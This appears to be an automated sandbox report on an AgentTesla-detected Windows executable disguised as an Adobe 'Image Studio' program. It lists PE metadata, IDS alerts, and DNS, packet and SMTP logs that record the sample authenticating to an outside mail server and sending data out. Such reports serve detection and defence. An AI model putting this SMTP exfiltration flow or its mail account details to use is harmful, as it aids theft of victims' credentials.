                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R.s`..............P.................. ... ....@.. ....................................@................................

                                                        File Icon

                                                        Icon Hash:1103212484000000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4802aa
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                        Time Stamp:0x6073F552 [Mon Apr 12 07:22:58 2021 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:v4.0.30319
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        or dword ptr [edx], ecx
                                                        or eax, 00000020h
                                                        add byte ptr [ecx+49h], cl
                                                        sub al, byte ptr [eax]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        dec ebp
                                                        dec ebp
                                                        add byte ptr [edx], ch
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x802580x4f.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x820000x1983c.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x9c0000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000x7e2c80x7e400False0.881789526609PGP symmetric key encrypted data - Plaintext or unencrypted data7.81409495243IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rsrc0x820000x1983c0x19a00False0.196741615854data3.42109206296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x9c0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        RT_ICON0x822200x468GLS_BINARY_LSB_FIRST
                                                        RT_ICON0x826880x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294901502, next used block 4294901502
                                                        RT_ICON0x837300x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4294901502, next used block 4294901502
                                                        RT_ICON0x85cd80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4294901502, next used block 4294901502
                                                        RT_ICON0x89f000x10828data
                                                        RT_GROUP_ICON0x9a7280x4cdata
                                                        RT_GROUP_ICON0x9a7740x14data
                                                        RT_VERSION0x9a7880x38cPGP symmetric key encrypted data - Plaintext or unencrypted data
                                                        RT_MANIFEST0x9ab140xd25XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Version Infos

                                                        DescriptionData
                                                        Translation0x0000 0x04b0
                                                        LegalCopyrightCopyright Adobe Inc, Sel 2011 - 2021
                                                        Assembly Version1.0.0.0
                                                        InternalNameEventResetMode.exe
                                                        FileVersion1.0.0.0
                                                        CompanyNameAdobe Inc, Sel
                                                        LegalTrademarks
                                                        Comments
                                                        ProductNameImage Studio
                                                        ProductVersion1.0.0.0
                                                        FileDescriptionImage Studio
                                                        OriginalFilenameEventResetMode.exe

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        04/12/21-15:32:11.865425TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49763587192.168.2.4208.91.199.135
                                                        04/12/21-15:32:16.013568TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49764587192.168.2.4208.91.199.135

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Apr 12, 2021 15:32:10.188775063 CEST49763587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:10.357816935 CEST58749763208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:10.358504057 CEST49763587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:10.765691042 CEST58749763208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:10.766298056 CEST49763587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:10.941135883 CEST58749763208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:10.942754984 CEST49763587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:11.118453026 CEST58749763208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:11.119129896 CEST49763587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:11.324501991 CEST58749763208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:11.325351954 CEST49763587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:11.499969959 CEST58749763208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:11.500483036 CEST49763587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:11.687432051 CEST58749763208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:11.687797070 CEST49763587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:11.862266064 CEST58749763208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:11.862364054 CEST58749763208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:11.865425110 CEST49763587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:11.865778923 CEST49763587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:11.866642952 CEST49763587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:11.866820097 CEST49763587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:12.034543037 CEST58749763208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:12.035501957 CEST58749763208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:12.037487984 CEST58749763208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:12.080284119 CEST49763587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:13.614428043 CEST49763587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:13.789947033 CEST58749763208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:13.790798903 CEST49763587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:13.792022943 CEST49763587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:13.966669083 CEST58749763208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:14.397428989 CEST49764587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:14.562386990 CEST58749764208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:14.562629938 CEST49764587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:14.965632915 CEST58749764208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:14.966111898 CEST49764587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:15.131253004 CEST58749764208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:15.131865025 CEST49764587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:15.297158003 CEST58749764208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:15.298182011 CEST49764587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:15.474678993 CEST58749764208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:15.475152016 CEST49764587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:15.649852991 CEST58749764208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:15.650204897 CEST49764587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:15.836138010 CEST58749764208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:15.836350918 CEST49764587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:16.011018991 CEST58749764208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:16.011070967 CEST58749764208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:16.013051987 CEST49764587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:16.013567924 CEST49764587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:16.013890982 CEST49764587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:16.014468908 CEST49764587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:16.014880896 CEST49764587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:16.015136957 CEST49764587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:16.015306950 CEST49764587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:16.015463114 CEST49764587192.168.2.4208.91.199.135
                                                        Apr 12, 2021 15:32:16.188087940 CEST58749764208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:16.188873053 CEST58749764208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:16.189342976 CEST58749764208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:16.189690113 CEST58749764208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:16.191374063 CEST58749764208.91.199.135192.168.2.4
                                                        Apr 12, 2021 15:32:16.236478090 CEST49764587192.168.2.4208.91.199.135

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Apr 12, 2021 15:30:10.536741018 CEST6524853192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:30:10.554172993 CEST5372353192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:30:10.585721016 CEST53652488.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:30:10.627959967 CEST53537238.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:30:13.145498991 CEST6464653192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:30:13.196250916 CEST53646468.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:30:14.183625937 CEST6529853192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:30:14.242912054 CEST53652988.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:30:16.981522083 CEST5912353192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:30:17.033129930 CEST53591238.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:30:18.344963074 CEST5453153192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:30:18.393522024 CEST53545318.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:30:20.047566891 CEST4971453192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:30:20.096324921 CEST53497148.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:30:20.984571934 CEST5802853192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:30:21.033447027 CEST53580288.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:30:22.095227003 CEST5309753192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:30:22.152257919 CEST53530978.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:30:24.788847923 CEST4925753192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:30:24.846043110 CEST53492578.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:30:25.729618073 CEST6238953192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:30:25.778316021 CEST53623898.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:30:27.165736914 CEST4991053192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:30:27.217328072 CEST53499108.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:30:37.479927063 CEST5585453192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:30:37.531529903 CEST53558548.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:30:45.099642038 CEST6454953192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:30:45.149485111 CEST53645498.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:31:06.127593040 CEST6315353192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:31:06.176506996 CEST53631538.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:31:06.445293903 CEST5299153192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:31:06.557193041 CEST53529918.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:31:07.630270958 CEST5370053192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:31:07.742788076 CEST53537008.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:31:08.410974026 CEST5172653192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:31:08.471290112 CEST53517268.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:31:09.018810034 CEST5679453192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:31:09.076404095 CEST53567948.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:31:09.374248981 CEST5653453192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:31:09.446960926 CEST53565348.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:31:10.023163080 CEST5662753192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:31:10.074780941 CEST53566278.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:31:10.131000996 CEST5662153192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:31:10.179538012 CEST53566218.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:31:11.291363001 CEST6311653192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:31:11.399669886 CEST53631168.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:31:13.121179104 CEST6407853192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:31:13.178277016 CEST53640788.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:31:15.039782047 CEST6480153192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:31:15.102057934 CEST53648018.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:31:15.642467022 CEST6172153192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:31:15.693048954 CEST53617218.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:31:16.089579105 CEST5125553192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:31:16.236175060 CEST53512558.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:31:16.861805916 CEST6152253192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:31:16.925910950 CEST53615228.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:31:17.454323053 CEST5233753192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:31:17.502975941 CEST53523378.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:31:18.594506979 CEST5504653192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:31:18.646411896 CEST53550468.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:31:21.073769093 CEST4961253192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:31:21.124227047 CEST53496128.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:31:22.138350964 CEST4928553192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:31:22.189939022 CEST53492858.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:31:23.260183096 CEST5060153192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:31:23.321536064 CEST53506018.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:31:24.215230942 CEST6087553192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:31:24.276364088 CEST53608758.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:31:52.727340937 CEST5644853192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:31:52.776074886 CEST53564488.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:31:54.123553038 CEST5917253192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:31:54.172414064 CEST53591728.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:31:54.536668062 CEST6242053192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:31:54.594189882 CEST53624208.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:32:09.851968050 CEST6057953192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:32:10.054696083 CEST53605798.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:32:14.179001093 CEST5018353192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:32:14.394840002 CEST53501838.8.8.8192.168.2.4
                                                        Apr 12, 2021 15:32:22.054699898 CEST6153153192.168.2.48.8.8.8
                                                        Apr 12, 2021 15:32:22.116394997 CEST53615318.8.8.8192.168.2.4

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Apr 12, 2021 15:32:09.851968050 CEST192.168.2.48.8.8.80x60ccStandard query (0)webmail.satguruclearing.comA (IP address)IN (0x0001)
                                                        Apr 12, 2021 15:32:14.179001093 CEST192.168.2.48.8.8.80x8ec4Standard query (0)webmail.satguruclearing.comA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Apr 12, 2021 15:32:10.054696083 CEST8.8.8.8192.168.2.40x60ccNo error (0)webmail.satguruclearing.com208.91.199.135A (IP address)IN (0x0001)
                                                        Apr 12, 2021 15:32:14.394840002 CEST8.8.8.8192.168.2.40x8ec4No error (0)webmail.satguruclearing.com208.91.199.135A (IP address)IN (0x0001)

                                                        SMTP Packets

                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                        Apr 12, 2021 15:32:10.765691042 CEST58749763208.91.199.135192.168.2.4220-md-73.webhostbox.net ESMTP Exim 4.94 #2 Mon, 12 Apr 2021 13:32:10 +0000
                                                        220-We do not authorize the use of this system to transport unsolicited,
                                                        220 and/or bulk e-mail.
                                                        Apr 12, 2021 15:32:10.766298056 CEST49763587192.168.2.4208.91.199.135EHLO 536720
                                                        Apr 12, 2021 15:32:10.941135883 CEST58749763208.91.199.135192.168.2.4250-md-73.webhostbox.net Hello 536720 [84.17.52.3]
                                                        250-SIZE 52428800
                                                        250-8BITMIME
                                                        250-PIPELINING
                                                        250-X_PIPE_CONNECT
                                                        250-AUTH PLAIN LOGIN
                                                        250-STARTTLS
                                                        250 HELP
                                                        Apr 12, 2021 15:32:10.942754984 CEST49763587192.168.2.4208.91.199.135AUTH login a2lzaG9yZUBzYXRndXJ1Y2xlYXJpbmcuY29t
                                                        Apr 12, 2021 15:32:11.118453026 CEST58749763208.91.199.135192.168.2.4334 UGFzc3dvcmQ6
                                                        Apr 12, 2021 15:32:11.324501991 CEST58749763208.91.199.135192.168.2.4235 Authentication succeeded
                                                        Apr 12, 2021 15:32:11.325351954 CEST49763587192.168.2.4208.91.199.135MAIL FROM:<kishore@satguruclearing.com>
                                                        Apr 12, 2021 15:32:11.499969959 CEST58749763208.91.199.135192.168.2.4250 OK
                                                        Apr 12, 2021 15:32:11.500483036 CEST49763587192.168.2.4208.91.199.135RCPT TO:<kishore@satguruclearing.com>
                                                        Apr 12, 2021 15:32:11.687432051 CEST58749763208.91.199.135192.168.2.4250 Accepted
                                                        Apr 12, 2021 15:32:11.687797070 CEST49763587192.168.2.4208.91.199.135DATA
                                                        Apr 12, 2021 15:32:11.862364054 CEST58749763208.91.199.135192.168.2.4354 Enter message, ending with "." on a line by itself
                                                        Apr 12, 2021 15:32:11.866820097 CEST49763587192.168.2.4208.91.199.135.
                                                        Apr 12, 2021 15:32:12.037487984 CEST58749763208.91.199.135192.168.2.4250 OK id=1lVwfj-001fZd-PI
                                                        Apr 12, 2021 15:32:13.614428043 CEST49763587192.168.2.4208.91.199.135QUIT
                                                        Apr 12, 2021 15:32:13.789947033 CEST58749763208.91.199.135192.168.2.4221 md-73.webhostbox.net closing connection
                                                        Apr 12, 2021 15:32:14.965632915 CEST58749764208.91.199.135192.168.2.4220-md-73.webhostbox.net ESMTP Exim 4.94 #2 Mon, 12 Apr 2021 13:32:14 +0000
                                                        220-We do not authorize the use of this system to transport unsolicited,
                                                        220 and/or bulk e-mail.
                                                        Apr 12, 2021 15:32:14.966111898 CEST49764587192.168.2.4208.91.199.135EHLO 536720
                                                        Apr 12, 2021 15:32:15.131253004 CEST58749764208.91.199.135192.168.2.4250-md-73.webhostbox.net Hello 536720 [84.17.52.3]
                                                        250-SIZE 52428800
                                                        250-8BITMIME
                                                        250-PIPELINING
                                                        250-X_PIPE_CONNECT
                                                        250-AUTH PLAIN LOGIN
                                                        250-STARTTLS
                                                        250 HELP
                                                        Apr 12, 2021 15:32:15.131865025 CEST49764587192.168.2.4208.91.199.135AUTH login a2lzaG9yZUBzYXRndXJ1Y2xlYXJpbmcuY29t
                                                        Apr 12, 2021 15:32:15.297158003 CEST58749764208.91.199.135192.168.2.4334 UGFzc3dvcmQ6
                                                        Apr 12, 2021 15:32:15.474678993 CEST58749764208.91.199.135192.168.2.4235 Authentication succeeded
                                                        Apr 12, 2021 15:32:15.475152016 CEST49764587192.168.2.4208.91.199.135MAIL FROM:<kishore@satguruclearing.com>
                                                        Apr 12, 2021 15:32:15.649852991 CEST58749764208.91.199.135192.168.2.4250 OK
                                                        Apr 12, 2021 15:32:15.650204897 CEST49764587192.168.2.4208.91.199.135RCPT TO:<kishore@satguruclearing.com>
                                                        Apr 12, 2021 15:32:15.836138010 CEST58749764208.91.199.135192.168.2.4250 Accepted
                                                        Apr 12, 2021 15:32:15.836350918 CEST49764587192.168.2.4208.91.199.135DATA
                                                        Apr 12, 2021 15:32:16.011070967 CEST58749764208.91.199.135192.168.2.4354 Enter message, ending with "." on a line by itself
                                                        Apr 12, 2021 15:32:16.015463114 CEST49764587192.168.2.4208.91.199.135.
                                                        Apr 12, 2021 15:32:16.191374063 CEST58749764208.91.199.135192.168.2.4250 OK id=1lVwfn-001faU-U5

                                                        Code Manipulations

                                                        Statistics

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Start time:15:30:17
                                                        Start date:12/04/2021
                                                        Path:C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe'
                                                        Imagebase:0xeb0000
                                                        File size:623104 bytes
                                                        MD5 hash:7A7078E03FD2FEE66B7436DA7222D2E0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.665376821.0000000004579000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.664541642.0000000003381000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        General

                                                        Start time:15:30:25
                                                        Start date:12/04/2021
                                                        Path:C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe
                                                        Imagebase:0x830000
                                                        File size:623104 bytes
                                                        MD5 hash:7A7078E03FD2FEE66B7436DA7222D2E0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.911263049.0000000002B71000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.911263049.0000000002B71000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.909140573.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        General

                                                        Start time:15:30:56
                                                        Start date:12/04/2021
                                                        Path:C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe'
                                                        Imagebase:0x350000
                                                        File size:623104 bytes
                                                        MD5 hash:7A7078E03FD2FEE66B7436DA7222D2E0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.746129783.00000000039B8000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 25%, ReversingLabs
                                                        Reputation:low

                                                        General

                                                        Start time:15:31:01
                                                        Start date:12/04/2021
                                                        Path:C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe
                                                        Imagebase:0xf20000
                                                        File size:623104 bytes
                                                        MD5 hash:7A7078E03FD2FEE66B7436DA7222D2E0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.909153388.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.910963365.0000000003201000.00000004.00000001.sdmp, Author: Joe Security
